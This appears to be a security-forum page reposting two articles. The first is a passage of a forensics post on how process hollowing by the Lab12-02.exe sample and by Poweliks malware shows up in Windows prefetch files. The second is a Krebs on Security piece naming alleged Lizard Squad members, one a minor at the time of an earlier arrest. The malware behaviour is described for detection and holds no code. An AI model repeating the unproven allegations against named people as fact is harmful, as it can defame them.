at offset 0x0010. Now let's take a look at the prefetch file for a svchost.exe process that was hollowed out. The Lab12-02.exe executable provided with Practical Malware Analysis performs process hollowing to the svchost.exe process. This can be seen performing dynamic analysis on the executable. The images below are from the executable being ran in Malwr. Lab12-02.exe first creates the svchost.exe process in the suspended state. Notice the creation flag of 0x00000004. Also, make note about the process handle to the suspended process (0x00000094). Lab12-02.exe then continues by injecting code into the suspended svchost.exe process. Lab12-02.exe finishes injecting code into the suspended svchost.exe process with the process handle 0x00000094 before it resumes the suspended process. Below is the partial output from this prefetch file being parsed with Harlan's pref.pl script. File : C:\ Prefetch\SVCHOST.EXE-3530F672.pf Exe Path : SVCHOST.EXE-3530F672.pf Last Run : Wed Dec 17 20:59:48 2014 Run Count: 1 Module paths: \DEVICE\HARDDISKVOLUME1\WINDOWS\SYSTEM32\NTDLL.DLL \DEVICE\HARDDISKVOLUME1\WINDOWS\SYSTEM32\KERNEL32.DLL \DEVICE\HARDDISKVOLUME1\WINDOWS\SYSTEM32\UNICODE.NLS \DEVICE\HARDDISKVOLUME1\WINDOWS\SYSTEM32\LOCALE.NLS It may not be obvious in the partial output but the files accessed by the injected code is different than the normal svchost.exe process. One of the more obvious files is what is not accessed; the original executable itself. Notice how the executable path contains the name of the prefetch file and this is due to the actual svchost.exe process not being accessed within 10 seconds of the injected code running. [h=3]Circling Back To Poweliks[/h] I mentioned previously that I noticed this behavior when researching the Poweliks fileless malware. This malware doesn't write its binary to disk since it stays in memory. The malware is not only not on the hard drive but other typical artifacts may not be present as well (such as the normal program execution artifacts.) In the near future I'll have a detailed post about how to triage systems impacted by this malware but I wanted highlight why the information I shared in this post matters. The screenshot below shows parsed prefetch files from a test system infected with a Poweliks dropper. My only clue to you is: one prefetch file is not like the others? There is one dllhost.exe prefetch file that has the missing process path. A closer inspection of this prefetch file reveals some other interesting file access during application start-up: During access start-up files associated with Internet activity were accessed in addition to the WININET.DLL dll for making HTTP requests. When Poweliks (or at least the samples I've reviewed) initially infects a computer it performs the following actions: rundll32.exe process starts the powershell.exe process that then starts a suspended dllhost.exe and injects code into it. Powershell.exe then resumes the dllhost.exe process that executes the Poweliks malicious code. The screenhots above illustrate the behavior of process hollowing performed by Poweliks and the impact on the dllhost.exe prefetch file. The above indication of the missing executable path in the dllhost.exe prefetch file is only for the initial infection when process hollowing is used. (The malicious code doesn't access the file it injects in once it executes) If Poweliks remains persistent and the system reboots the malicious code is still injected into dllhost.exe process but it doesn't appear to be process hollowing. These dllhost.exe prefetch files will contain the dllhost.exe executable path; along with the trace for suspicious file access as shown in the last screenshot. This is reflected in the second dllhost.exe prefetch file highlighted in the above screenshot. [h=2]Conclusion[/h] Uncovering behaviors during research is helpful to put something you take for granted in a different perspective. Process hollowing behaves in a specific way in the Windows operating system and it can impact prefetch files in a specific way. This impact can be used as an indicator to help explain what occurred on a system but it needs context. A missing process executable in a prefetch file does not mean process hollowing occurred. However, a missing process executable along with suspicious file access during application start-up and an indication a system was compromised means something completely else. Sursa: Journey Into Incident Response: Prefetch File Meet Process Hollowing
  25. Nytro
    Who’s in the Lizard Squad? The core members of a group calling itself “Lizard Squad” — which took responsibility for attacking Sony’s Playstation and Microsoft‘s Xbox networks and knocking them offline for Christmas Day — want very much to be recognized for their actions. So, here’s a closer look at two young men who appear to be anxious to let the world know they are closely connected to the attacks. Kim Dotcom offers Lizard Squad members vouchers to stop the attack. The LizardSquad reportedly only called off their attacks after MegaUpload founder Kim Dotcom offered the group some 3,000 vouchers for his content hosting service. The vouchers sell for $99 apiece, meaning that Dotcom effectively offered the group the equivalent of $300,000 to stop their seige. On Dec. 26, BBC Radio with two young men who claimed to have been involved in the attacks. The two were referred to in the interview only as “Member 1? and “Member 2,” but both have each given on-camera interviews previously (more on that in a bit). The BBC’s Stephen Nolan asks Member 2, “It was nothing really to do with exposing a company for the greater good? You took the money and you ran, didn’t you, like a petty criminal?” M2: “Well, we didn’t really expect money from it in the first place. If we really cared about money we could have used the twitter accounts that we generated over 50,000 followers within 24-48 hours we could have used that for monetization, you know? We could have easily sent out a couple of linked….profiles or whatever where each click could gain us three to six cents.” Vinnie Omari, speaking to Sky News on Dec. 27. Nolan: “So why did you take the vouchers, then? M2: “It was just an offer. It’s hard to say. It was just a one-time thing. It’s $300,000 worth of vouchers.” Nolan: “Dirty, grubby, greed?” M2: “Well, that’s what happens, I’m afraid. That’s what it is like in the security business.” Member2, the guy that does most of the talking in the BBC interview, appears to be a 22-year-old from the United Kingdom named Vinnie Omari. Sky News ran an on-camera interview with Omari on Dec. 27, quoting him as a “computer security analyst” as he talks about the attacks by LizardSquad and their supposed feud with a rival hacker gang. The same voice can be heard on from Vinnie’s Youtube channel, in which he enthuses about hackforums[dot]net, a forum that is overrun with teenage wannabe hackers who spend most of their time trying to impress, attack or steal from one another. In a thread on Hackforums that Omari began on Dec. 26 using the Hackforums username “Vinnie” Omari says he’s been given vouchers from MegaUpload, and wonders if the Hackforums rules allow him to sell the vouchers on the forum. Hackforums user “Vinnie” asks about selling MegaUpload vouchers. Member 1 from the BBC interview also gave , although he does not give his real name; he offers a pseudonym — “Ryan.” According to multiple sources, this individual is a Finnish teenager named Julius Kivimäki who has used a variety of online monikers, including “Zee,” “Zeekill” and “Ry|an.” Julius “Ryan” Kivimaki talks to Sky News about the Lizardsquad attacks. Sources say Kivimäki was arrested by Helsinki police in October 2013 on suspicion of running a huge botnet consisting of more than 60,000 hacked Web servers around the world. Local Finnish media reported on the youth’s arrest, although they didn’t name him. Kivimäki, 16, also was reportedly found in possession of more than 3,000 stolen credit cards. Both of these individuals may in fact be guilty of nothing more than taking credit for other peoples’ crimes. But I hope it’s clear to the media that the Lizard Squad is not some sophisticated hacker group. The Lizard Squad’s monocle-wearing mascot shows them to be little more than a group of fame-seeking kids who desperately aspire to be like LulzSec, a similarly minded gang whose core members are all now in jail. With any luck, these kids will get their wish soon enough. Sursa: Who’s in the Lizard Squad? — Krebs on Security
×
×
  • Create New...